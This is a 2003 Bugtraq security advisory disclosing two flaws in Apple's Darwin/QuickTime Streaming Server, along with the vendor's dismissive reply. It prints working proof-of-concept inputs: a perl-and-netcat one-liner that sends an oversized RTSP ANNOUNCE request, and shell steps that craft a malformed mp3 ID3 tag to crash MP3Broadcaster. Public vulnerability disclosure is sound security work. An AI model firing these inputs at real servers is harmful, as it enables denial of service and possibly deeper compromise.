QuickTime/Darwin Streaming Server security issues

From: Sir Mordred (mordred_at_s-mail.com)
Date: 05/22/03

  • Next message: Mandrake Linux Security Team: "MDKSA-2003:060 - Updated LPRng packages fix insecure temporary file vulnerability"
    Date: Thu, 22 May 2003 19:11:05 +0000
    To: bugtraq@securityfocus.com
    
    

    // @(#)Security advisory: QuickTime/Darwin Streaming server security issues

    Release date: May 22, 2003
    Name: QuickTime/Darwin Streaming server security issues
    Author: Sir Mordred (mordred@s-mail.com)

    I. DESCRIPTION

    Darwin Streaming Server (DSS) is server technology which allows
    you to send streaming QuickTime data to clients across the Internet using
    the industry standard RTP and RTSP protocols.
    It is based on the same code as Apple's QuickTime Streaming Server.
    Please visit http://developer.apple.com/darwin/projects/streaming/ for more
    information about DSS.

    II. DETAILS

    * ISSUE 1 - Integer overflow in QTSSReflector module

    Integer overflow exists in ANNOUNCE request parsing routine:

    $ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-length:4294967295\n\n",
    "A"x8192' | nc -v localhost 554
    localhost [127.0.0.1] 554 (rtsp) open
    too many output retries : Broken pipe

    * ISSUE 2 - Integer handling vulnerability in MP3Broadcaster utility

    MP3Broadcaster utility which is shipped with DSS, suffers from integer
    handling vulnerability in ID3 tags parsing routines.
    Below are the steps how to reproduce the issue:

    First create the sample configuration file:
    $ echo -e "\n" > test.conf

    Then create a playlist file:
    $ echo -e "*PLAY-LIST*\nsong.mp3" > mp3playlist.ply

    Create a specially crafted mp3 file:
    $ echo -e
    "ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00

    " > song.mp3

    Now, when the user tries to check his mp3 files (-X option):
    $ MP3Broadcaster -X -l mp3playlist.ply -c test.conf

    Configuration Settings
    --------------------------
    ...
    play_mode sequential
    playlist_file mp3playlist.ply
    ...

    There is one movie in the Playlist.

    Segmentation fault (core dumped)

    III. VERSIONS TESTED

    Linux RedHat 7.2 with DSS 4.1.3

    $ echo -ne "OPTIONS * RTSP/1.0\nCseq: 1\n\n" | nc localhost 554
    RTSP/1.0 200 OK
    Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
    Cseq: 1
    Public: DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, ANNOUNCE,
    SET_PARAMETER,RECORD

    IV. VENDOR STATUS

    The emails have been sent to product-security@apple.com,
    streaming-server-developers@lists.apple.com and after a bit of waiting got
    rather interesting answer from Joel Hedden <jhedden@apple.com>:

    <quote>
    Please correct us if this is wrong:
    1. The bugs are only DoS attacks and cannot be used to breach security of
    the host machine, run arbitrary code, etc.
    2. Neither bug is remotely exploitable unless the administrator has
    enabled
    unauthenticated remote broadcasts (which is not likely).
    </quote>

    I think both of the "bugs" can be used to "breach security of the host
    machine, run arbitrary code, etc"...
    After receiving response from Apple just decided to publish the advisory a
    bit earlier then i planned.

    V. CREDITS

    Credits go to:

    Sir Mordred <mordred@s-mail.com> who discovered the issues.

    ________________________________________________________________________
    This letter has been delivered unencrypted. We'd like to remind you that
    the full protection of e-mail correspondence is provided by S-mail
    encryption mechanisms if only both, Sender and Recipient use S-mail.
    Register at S-mail.com: http://www.s-mail.com


  • Next message: Mandrake Linux Security Team: "MDKSA-2003:060 - Updated LPRng packages fix insecure temporary file vulnerability"